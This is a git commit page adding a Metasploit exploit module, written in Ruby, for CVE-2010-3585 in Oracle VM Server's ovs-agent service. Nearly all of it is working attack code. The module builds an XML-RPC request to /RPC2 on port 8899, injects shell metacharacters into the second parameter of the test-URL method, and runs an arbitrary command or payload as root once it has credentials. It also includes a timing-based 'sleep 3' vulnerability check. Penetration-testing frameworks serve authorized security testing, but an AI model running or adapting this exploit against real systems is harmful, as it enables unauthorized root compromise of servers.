add exploit module for cve-2010-3585
git-svn-id: file:///home/svn/framework3/trunk@10780 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
6bd75bb2d5
commit
7a9fe2c4d7
|
@ -0,0 +1,166 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Oracle VM Server Virtual Server Agent Command Injection',
|
||||
'Description' => %q{
|
||||
This module exploits a command injection flaw within Oracle\'s VM Server
|
||||
Virtual Server Agent (ovs-agent) service.
|
||||
|
||||
By including shell meta characters within the second parameter to the 'urt_test_url'
|
||||
XML-RPC methodCall, an attacker can execute arbitrary commands. The service
|
||||
typically runs with root privileges.
|
||||
|
||||
NOTE: Valid credentials are required to trigger this vulnerable. The username
|
||||
appears to be hardcoded as 'oracle', but the password is set by the administrator
|
||||
at installation time.
|
||||
},
|
||||
'Author' => [ 'jduck' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
# ovs-agent.spec:- Fix ovs agent command injection [orabug 10146644] {CVE-2010-3585}
|
||||
['CVE', '2010-3585'],
|
||||
['BID', '44047']
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Platform' => ['unix', 'linux'],
|
||||
'Arch' => ARCH_CMD,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 512,
|
||||
'BadChars' => '<>',
|
||||
'DisableNops' => true,
|
||||
'Keys' => ['cmd', 'cmd_bash'],
|
||||
},
|
||||
'Targets' => [ ['Automatic', { }], ],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Oct 12 2010'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8899),
|
||||
OptBool.new('SSL', [ true, 'Use SSL', true ]),
|
||||
OptString.new('CMD', [ false, "A single command to execute instead of the payload" ]),
|
||||
OptString.new('USERNAME', [ true, "The user to authenticate as", 'oracle']),
|
||||
OptString.new('PASSWORD', [ true, "The password to authenticate with" ])
|
||||
], self.class)
|
||||
|
||||
deregister_options(
|
||||
'HTTP::junk_params', # not your typical POST, so don't inject params.
|
||||
'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
|
||||
)
|
||||
end
|
||||
|
||||
def go(command)
|
||||
datastore['BasicAuthUser'] = datastore['USERNAME']
|
||||
datastore['BasicAuthPass'] = datastore['PASSWORD']
|
||||
|
||||
xml = <<-EOS
|
||||
<?xml version="1.0"?>
|
||||
<methodCall>
|
||||
<methodName>utl_test_url</methodName>
|
||||
<params><param>
|
||||
<value><string>PARAM1</string></value>
|
||||
</param></params>
|
||||
<params><param>
|
||||
<value><string>PARAM2</string></value>
|
||||
</param></params>
|
||||
<params><param>
|
||||
<value><string>PARAM3</string></value>
|
||||
</param></params>
|
||||
<params><param>
|
||||
<value><string>PARAM4</string></value>
|
||||
</param></params>
|
||||
</methodCall>
|
||||
EOS
|
||||
|
||||
sploit = rand_text_alphanumeric(rand(128)+32)
|
||||
sploit << "';" + command + ";'"
|
||||
|
||||
xml.gsub!(/PARAM1/, 'http://' + rand_text_alphanumeric(rand(128)+32) + '/')
|
||||
xml.gsub!(/PARAM2/, sploit)
|
||||
xml.gsub!(/PARAM3/, rand_text_alphanumeric(rand(128)+32))
|
||||
xml.gsub!(/PARAM4/, rand_text_alphanumeric(rand(128)+32))
|
||||
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => '/RPC2',
|
||||
'method' => 'POST',
|
||||
'ctype' => 'application/xml',
|
||||
'data' => xml,
|
||||
}, 5)
|
||||
|
||||
if not res
|
||||
if not session_created?
|
||||
print_error('Unable to complete XML-RPC request')
|
||||
return nil
|
||||
end
|
||||
|
||||
# no response, but session created!!!
|
||||
return true
|
||||
end
|
||||
|
||||
case res.code
|
||||
when 403
|
||||
print_error('Authentication failed!')
|
||||
return nil
|
||||
|
||||
when 200
|
||||
print_good('Our request was accepted!')
|
||||
return res
|
||||
|
||||
end
|
||||
|
||||
print_error("Encountered unexpected #{res.code} reponse:")
|
||||
print_error(res.inspect)
|
||||
|
||||
return nil
|
||||
end
|
||||
|
||||
def check
|
||||
print_status("Attempting to detect if the server is vulnerable...")
|
||||
|
||||
# Try running/timing sleep 3
|
||||
start = Time.now
|
||||
go('sleep 3')
|
||||
elapsed = Time.now - start
|
||||
if elapsed >= 3 and elapsed <= 4
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("Attempting to execute the payload...")
|
||||
|
||||
cmd = datastore['CMD']
|
||||
cmd ||= payload.encoded
|
||||
|
||||
if not go(cmd)
|
||||
raise RuntimeError, "Unable to execute the desired command"
|
||||
end
|
||||
|
||||
handler
|
||||
end
|
||||
|
||||
end
|
Loading…
Reference in New Issue